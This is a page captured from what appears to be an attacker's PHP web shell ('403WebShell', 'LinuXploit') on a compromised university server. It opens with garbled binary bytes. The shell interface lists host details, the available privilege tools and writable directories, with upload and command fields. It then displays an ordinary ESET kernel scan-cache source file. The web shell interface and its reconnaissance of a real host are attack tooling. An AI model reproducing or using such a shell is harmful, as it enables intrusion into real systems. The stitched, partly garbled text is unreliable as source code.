h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/opt/eset/efs/eventd/eset_rtp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/opt/eset/efs/eventd/eset_rtp/ertp_cache.c
/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2021 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */

#include "ertp_cache.h"
#include "ertp_scan_mask.h"
#include "ertp.h"

/* cache stores just clean results, infected files are sent to scanner on every event
   (there is just the optimization with no parallel scans of the same file) */

struct ertp_inode_data {
	struct list_head    time_list;  /* entry to inode data list sorted according to last usage time */
	const struct inode *inode;      /* ID */
	unsigned long       i_ino;      /* inode number */
	dev_t               s_dev;      /* internal device number */
	int                 result;     /* last result from scanner: ERTP_ALLOW or ERTP_UNKNOWN - only clean results are cached */
	uint32_t            scan_mask;  /* bit mask of applied scan settings for this record */

#if LINUX_VERSION_CODE < KERNEL_VERSION(4,18,0)
	struct timespec   cached_ctime; /* last change time of cached data */
	struct timespec   running_scan_ctime; /* last change time of currently scanned file */
#else
	struct timespec64 cached_ctime; /* last change time of cached data */
	struct timespec64 running_scan_ctime; /* last change time of currently scanned file */
#endif

	atomic_t           count; /* refcount */
	spinlock_t         lock; /* lock protecting data */
	struct ertp_event *scan_in_progress; /* non-nullpointer if this file is currently scanned and eset_rtp is waiting for response */
	struct list_head   waiting_events; /* entry to list of events waiting for this result */
};

/* memory cache where data are allocated */
static struct kmem_cache *ertp_scan_cache = NULL;

/* radix tree for quick look up */
static RADIX_TREE(ertp_scan_radix_tree, GFP_ATOMIC);

/* spinlock protecting radix tree */
static DEFINE_SPINLOCK(ertp_scan_radix_tree_lock);

struct ertp_scan_time_list_t {
	struct list_head root;
	spinlock_t lock;
	size_t size;
	size_t max_size;
};

/* list of inode data, sorted according last access time */
static struct ertp_scan_time_list_t ertp_scan_time_list = {
	.root = LIST_HEAD_INIT(ertp_scan_time_list.root),
	.lock = __SPIN_LOCK_UNLOCKED(ertp_scan_time_list.lock),
	.size = 0,
	.max_size = 100000,
};

static void ertp_cache_set_scan_is_finished_internal(struct ertp_inode_data *data, int result, uint32_t scan_mask)
{
	struct ertp_event *attached_event;
	struct ertp_event *event;
	struct ertp_event *tmp;
	LIST_HEAD(finished_events_list);

	if (!data)
		return;

	spin_lock(&data->lock);
	attached_event = data->scan_in_progress;
	data->scan_in_progress = NULL;
	/* update just result (caching only clean files without any flags) and scan mask fields; ctime, inode etc. stay from the moment of scan beginning */
	data->result = (result & ERTP_DO_NOT_CACHE || result & ERTP_DENY) ? ERTP_UNKNOWN : result;
	data->scan_mask = scan_mask;

	list_for_each_entry_safe(event, tmp, &data->waiting_events, cache_waiting_list) {
		list_move_tail(&event->cache_waiting_list, &finished_events_list);
	}
	spin_unlock(&data->lock);

	ertp_event_put(attached_event);
	list_for_each_entry_safe(event, tmp, &finished_events_list, cache_waiting_list) {
		list_del_init(&event->cache_waiting_list);
		event->result = result; // use real result, e.g. ERTP_DENY for infected files
		ertp_event_done(event);
		ertp_pr_debug("event for inode: %lu unblocked via cache update", data->i_ino);
		ertp_event_put(event);
	}
}

static void ertp_inode_data_update_after_scan(struct ertp_inode_data *data)
{
	spin_lock(&ertp_scan_time_list.lock);
	if (!list_empty(&data->time_list)) {
		/* move data at the end of time cache list */
		list_move_tail(&data->time_list, &ertp_scan_time_list.root);
	}
	spin_unlock(&ertp_scan_time_list.lock);
}

static inline void ertp_inode_data_update_before_scan_unlocked(struct ertp_inode_data *data, const struct ertp_event *event)
{
	const struct inode *inode = event->f_path_dentry->d_inode;

	data->i_ino = inode->i_ino;
	data->s_dev = inode->i_sb->s_dev;
	data->result = ERTP_UNKNOWN;
	data->cached_ctime = inode->i_ctime;
	data->scan_mask = event->scan_mask;
}

static inline void ertp_inode_data_update_before_scan(struct ertp_inode_data *data, const struct ertp_event *event)
{
	spin_lock(&data->lock);
	ertp_inode_data_update_before_scan_unlocked(data, event);
	spin_unlock(&data->lock);
}

struct ertp_inode_data *ertp_inode_data_new(const struct ertp_event *event)
{
	struct ertp_inode_data *data;
	const struct inode *inode = event->f_path_dentry->d_inode;

	if (!inode)
		return ERR_PTR(-EINVAL);

	data = kmem_cache_zalloc(ertp_scan_cache, GFP_KERNEL);
	if (!data)
		return ERR_PTR(-ENOMEM);

	INIT_LIST_HEAD(&data->time_list);
	data->inode = inode;
	ertp_inode_data_update_before_scan_unlocked(data, event);
	atomic_set(&data->count, 1);
	spin_lock_init(&data->lock);
	INIT_LIST_HEAD(&data->waiting_events);
	data->scan_in_progress = NULL;

	return data;
}

void ertp_inode_data_ref(struct ertp_inode_data *data)
{
	atomic_inc(&data->count);
}

void ertp_inode_data_unref(struct ertp_inode_data *data)
{
	if (!data)
		return;

	if (atomic_dec_and_test(&data->count)) {
		ertp_cache_set_scan_is_finished_internal(data, ERTP_UNKNOWN, 0);
		kmem_cache_free(ertp_scan_cache, data);
	}
}

static struct ertp_inode_data *ertp_cache_lookup_inode(const struct inode *inode)
{
	struct ertp_inode_data *data;

	if (!inode)
		return NULL;

	spin_lock(&ertp_scan_radix_tree_lock);
	data = radix_tree_lookup(&ertp_scan_radix_tree, (long)inode);
	if (data)
		ertp_inode_data_ref(data);
	spin_unlock(&ertp_scan_radix_tree_lock);

	return data;
}

bool ertp_cache_add_event(struct ertp_event *event)
{
	bool ret = false;
	struct ertp_inode_data *data = ertp_cache_lookup_inode(event->f_path_dentry->d_inode);

	if (!data) {
		ertp_pr_debug("cache record for inode: %lu not found", data->i_ino);
		return false;
	}

	spin_lock(&data->lock);
	if (data->scan_in_progress) {
		ertp_event_get(event);
		list_add_tail(&event->cache_waiting_list, &data->waiting_events);
		ret = true;
		ertp_pr_debug("event for inode: %lu added to cache data and waiting for update", data->i_ino);
	}
	spin_unlock(&data->lock);

	ertp_inode_data_unref(data);
	return ret;
}

void ertp_cache_set_scan_is_running(const struct inode *inode, struct ertp_event *scan_in_progress)
{
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);
	if (!data || !scan_in_progress)
		return;

	spin_lock(&data->lock);
	if (!data->scan_in_progress) {
		data->running_scan_ctime = scan_in_progress->f_path_dentry->d_inode->i_ctime;
		data->scan_in_progress = ertp_event_get(scan_in_progress);
	}
	spin_unlock(&data->lock);

	ertp_inode_data_unref(data);
}

void ertp_cache_set_scan_is_finished(const struct inode *inode, int result, uint32_t scan_mask)
{
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);
	ertp_cache_set_scan_is_finished_internal(data, result, scan_mask);
	ertp_inode_data_unref(data);
}

/* remove oldest 10 percent of cache */
static void ertp_cache_optimize(void)
{
	struct ertp_inode_data *data;
	struct ertp_inode_data *tmp;
	LIST_HEAD(removed_data_list);
	size_t i = 0;

	// move 10% of entries from time list to a temporary one
	spin_lock(&ertp_scan_time_list.lock);
	for (; i < ertp_scan_time_list.size / 10; ++i) {
		struct ertp_inode_data *oldest_data = container_of(ertp_scan_time_list.root.next,
			struct ertp_inode_data, time_list);
		list_move_tail(&oldest_data->time_list, &removed_data_list);
	}

	ertp_pr_debug("Max cache size %zu reached removing %zu oldest records", ertp_scan_time_list.max_size, i);
	ertp_scan_time_list.size -= i;
	spin_unlock(&ertp_scan_time_list.lock);

	// remove them from radix tree
	spin_lock(&ertp_scan_radix_tree_lock);
	list_for_each_entry(data, &removed_data_list, time_list) {
		tmp = radix_tree_delete(&ertp_scan_radix_tree, (long)data->inode);
		if (tmp) {
			ertp_inode_data_unref(tmp); // paired with ertp_inode_data_ref() in ertp_cache_insert()
		}
	}
	spin_unlock(&ertp_scan_radix_tree_lock);

	// release all (no longer used) entries
	list_for_each_entry_safe(data, tmp, &removed_data_list, time_list) {
		ertp_pr_debug("deleting id: %lu, on addr: %p, with refcount: %d", (unsigned long)i++, data, atomic_read(&data->count));
		list_del_init(&data->time_list);
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert_data_to_time_list(()
	}
}

static void ertp_cache_insert_data_to_time_list(struct ertp_inode_data *data)
{
	bool max_size_exceeded;
	ertp_inode_data_ref(data);
	spin_lock(&ertp_scan_time_list.lock);
	list_add_tail(&data->time_list, &ertp_scan_time_list.root);
	++ertp_scan_time_list.size;
	max_size_exceeded = ertp_scan_time_list.size > ertp_scan_time_list.max_size;
	spin_unlock(&ertp_scan_time_list.lock);

	if (max_size_exceeded) {
		ertp_cache_optimize();
	}
}

static void ertp_cache_remove_data_from_time_list(struct ertp_inode_data *data)
{
	bool removed = false;
	spin_lock(&ertp_scan_time_list.lock);
	if (!list_empty(&data->time_list)) {
		list_del_init(&data->time_list);
		--ertp_scan_time_list.size;
		removed = true;
	}
	spin_unlock(&ertp_scan_time_list.lock);

	if (removed) {
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert_data_to_time_list(()
	}
}

int ertp_cache_insert(struct ertp_inode_data *data)
{
	int err = radix_tree_preload(GFP_KERNEL);
	if (err)
		return err; // -ENOMEM

	ertp_inode_data_ref(data);
	spin_lock(&ertp_scan_radix_tree_lock);
	{
		err = radix_tree_insert(&ertp_scan_radix_tree,
			(long)data->inode, data);
	}
	spin_unlock(&ertp_scan_radix_tree_lock);

	if (err) {
		// e.g. -EEXIST
		ertp_inode_data_unref(data);
		ertp_pr_debug("Cannot insert data to cache, inode %lu, device number %u, error %d",
			data->inode->i_ino, new_encode_dev(data->inode->i_sb->s_dev), err);
	}

	radix_tree_preload_end();

	if (!err)
		ertp_cache_insert_data_to_time_list(data);

	return err;
}

/* remove @inode from cache and release a reference */
void ertp_cache_remove_inode(const struct inode *inode)
{
	struct ertp_inode_data *data;
	if (unlikely(!inode)) {
		ertp_pr_debug("invalid inode!");
		return;
	}

	spin_lock(&ertp_scan_radix_tree_lock);
	data = radix_tree_delete(&ertp_scan_radix_tree, (long)inode);
	spin_unlock(&ertp_scan_radix_tree_lock);

	if (data) {
		ertp_pr_debug("data: %p removed from cache, refcount: %d", data, atomic_read(&data->count));
		// call (the last) ertp_inode_data_unref outside lock
		ertp_cache_remove_data_from_time_list(data);
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert()
	}
}

static inline bool ertp_scan_mask_usable(uint32_t scan_mask_of_running_scan, int type_of_new_event)
{
	uint32_t wanted_mask = ertp_scan_mask_get(type_of_new_event);
	return (scan_mask_of_running_scan & wanted_mask) == wanted_mask;
}

/* return true if event which is scanned can be used */
static inline bool ertp_cache_same_scan_in_progress(const struct inode *inode, const struct ertp_inode_data *data, int type)
{
	if (data->scan_in_progress && (data->scan_in_progress->ino == inode->i_ino)
	    && (data->scan_in_progress->dev == new_encode_dev(inode->i_sb->s_dev))
	    && (data->running_scan_ctime.tv_sec == inode->i_ctime.tv_sec)
	    && (data->running_scan_ctime.tv_nsec == inode->i_ctime.tv_nsec)
	    && ertp_scan_mask_usable(data->scan_in_progress->scan_mask, type)) {
		return true;
	}

	return false;
}

int ertp_cache_get_result(const struct inode *inode, struct ertp_inode_data *data, int type)
{
	int result = ERTP_UNKNOWN;

	spin_lock(&data->lock);

	/* inode mismatched - this is not the cached file! */
	if ((data->i_ino != inode->i_ino) || (data->s_dev != inode->i_sb->s_dev)) {
		goto exit;
	}

	/* result of currently scanned file can be used */
	if (ertp_cache_same_scan_in_progress(inode, data, type)) {
		result = ERTP_SCAN_IN_PROGRESS;
		goto exit;
	}

	/* file is changed */
	if ((data->cached_ctime.tv_sec != inode->i_ctime.tv_sec)
			|| (data->cached_ctime.tv_nsec != inode->i_ctime.tv_nsec)) {
		result = ERTP_MODIFIED;
		goto exit;
	}

	/* cached result has weaker scan settings mask */
	if (!ertp_scan_mask_usable(data->scan_mask, type)) {
		goto exit;
	}

	result = data->result;

exit:
	spin_unlock(&data->lock);
	return result;
}

void ertp_cache_clear(void)
{
	struct ertp_inode_data *data;
	struct ertp_inode_data *tmp;
	LIST_HEAD(removed_data_list);
#ifdef ERTP_DEBUG
	int i = 0;
#endif
	// move all entries from time list to a temporary one
	spin_lock(&ertp_scan_time_list.lock);
	list_for_each_entry_safe(data, tmp, &ertp_scan_time_list.root, time_list) {
		list_move_tail(&data->time_list, &removed_data_list);
	}
	ertp_scan_time_list.size = 0;
	spin_unlock(&ertp_scan_time_list.lock);

	// remove them from radix tree
	spin_lock(&ertp_scan_radix_tree_lock);
	list_for_each_entry(data, &removed_data_list, time_list) {
		tmp = radix_tree_delete(&ertp_scan_radix_tree, (long)data->inode);
		if (tmp) {
			ertp_inode_data_unref(tmp); // paired with ertp_inode_data_ref() in ertp_cache_insert()
		}
	}
	spin_unlock(&ertp_scan_radix_tree_lock);

	// release all (no longer used) entries
	list_for_each_entry_safe(data, tmp, &removed_data_list, time_list) {
		ertp_pr_debug("deleting id: %d, on addr: %p, with refcount: %d", i++, data, atomic_read(&data->count));
		list_del_init(&data->time_list);
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert_data_to_time_list(()
	}
}

void ertp_cache_set_size(size_t max_size)
{
	// clear old cached data
	ertp_cache_clear();
	spin_lock(&ertp_scan_time_list.lock);
	ertp_scan_time_list.max_size = max_size;
	spin_unlock(&ertp_scan_time_list.lock);
}

int ertp_cache_init(void)
{
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22)
	ertp_scan_cache = kmem_cache_create("ertp_scan_cache",
		sizeof(struct ertp_inode_data),
		0, SLAB_RECLAIM_ACCOUNT, NULL, NULL);
#else
	ertp_scan_cache = kmem_cache_create("ertp_scan_cache",
		sizeof(struct ertp_inode_data),
		0, SLAB_RECLAIM_ACCOUNT, NULL);
#endif

	if (!ertp_scan_cache)
		return -ENOMEM;

	return 0;
}

void ertp_cache_deinit(void)
{
	ertp_cache_clear();
	kmem_cache_destroy(ertp_scan_cache);
}

void ertp_cache_update(const struct ertp_event *event)
{
	const struct inode *inode = event->f_path_dentry->d_inode;
	struct ertp_inode_data *data;

	if (!inode)
		return;

	data = ertp_cache_lookup_inode(inode);

	/* all scanned files should already have records in the cache, but the cache could be reset from user space in meantime */
	if (!data) {
		ertp_pr_debug("No record in cache for event id %d, type %d, inode %lu, device number %u", event->id, event->type, inode->i_ino, new_encode_dev(inode->i_sb->s_dev));
		return;
	}

	ertp_cache_set_scan_is_finished_internal(data, event->result, event->scan_mask);
	ertp_inode_data_update_after_scan(data);
	ertp_inode_data_unref(data);

#ifdef ERTP_CACHE_DEBUG
	{
		static char BUF[256];
		const char *file_name = simple_dname(event->f_path_dentry, BUF, sizeof(BUF));
		if (!IS_ERR(file_name)) {
			ertp_pr_debug("event added to cache: id: %d, type: %s, file: %s, result:%s",
				event->id,
				(event->type == ERTP_OPEN) ? "Open" : "Close",
				file_name,
				(event->result == ERTP_ALLOW) ? "Allow" : "Deny"
			);
		}
	}
#endif
}

int ertp_cache_check(const struct file *file, int type)
{
	int result = ERTP_UNKNOWN;
	const struct inode *inode = file->f_dentry->d_inode;
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);

	if (!data)
		return ERTP_UNKNOWN;

	result = ertp_cache_get_result(inode, data, type);

	ertp_inode_data_unref(data);

#ifdef ERTP_CACHE_DEBUG
	{
		static char BUF[256];
		const char *file_name = simple_dname(file->f_path_dentry, BUF, sizeof(BUF));
		if (!IS_ERR(file_name)) {
			if ((result == ERTP_ALLOW) || (result == ERTP_DENY)) {
				ertp_pr_debug("using cached result: %s for event: %s, file: %s",
					(result == ERTP_ALLOW) ? "Allow" : "Deny",
					(type == ERTP_OPEN) ? "Open" : "Close",
					file_name
				);
			} else {
				ertp_pr_debug("cache result (%d) -> need to scan event: %s, file: %s",
					result,
					(type == ERTP_OPEN) ? "Open" : "Close",
					file_name
				);
			}
		}
	}
#endif
	return result;
}

int ertp_cache_insert_new_file(const struct inode *inode, const struct ertp_event *event)
{
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);
	if (data) {
		ertp_inode_data_update_before_scan(data, event);
	} else {
		/* not yet in cache */
		data = ertp_inode_data_new(event);
		if (IS_ERR(data)) {
			return -1;
		}
		ertp_cache_insert(data);
	}
	ertp_inode_data_unref(data);
	return 0;
}

Youez - 2016 - github.com/yon3zu
LinuXploit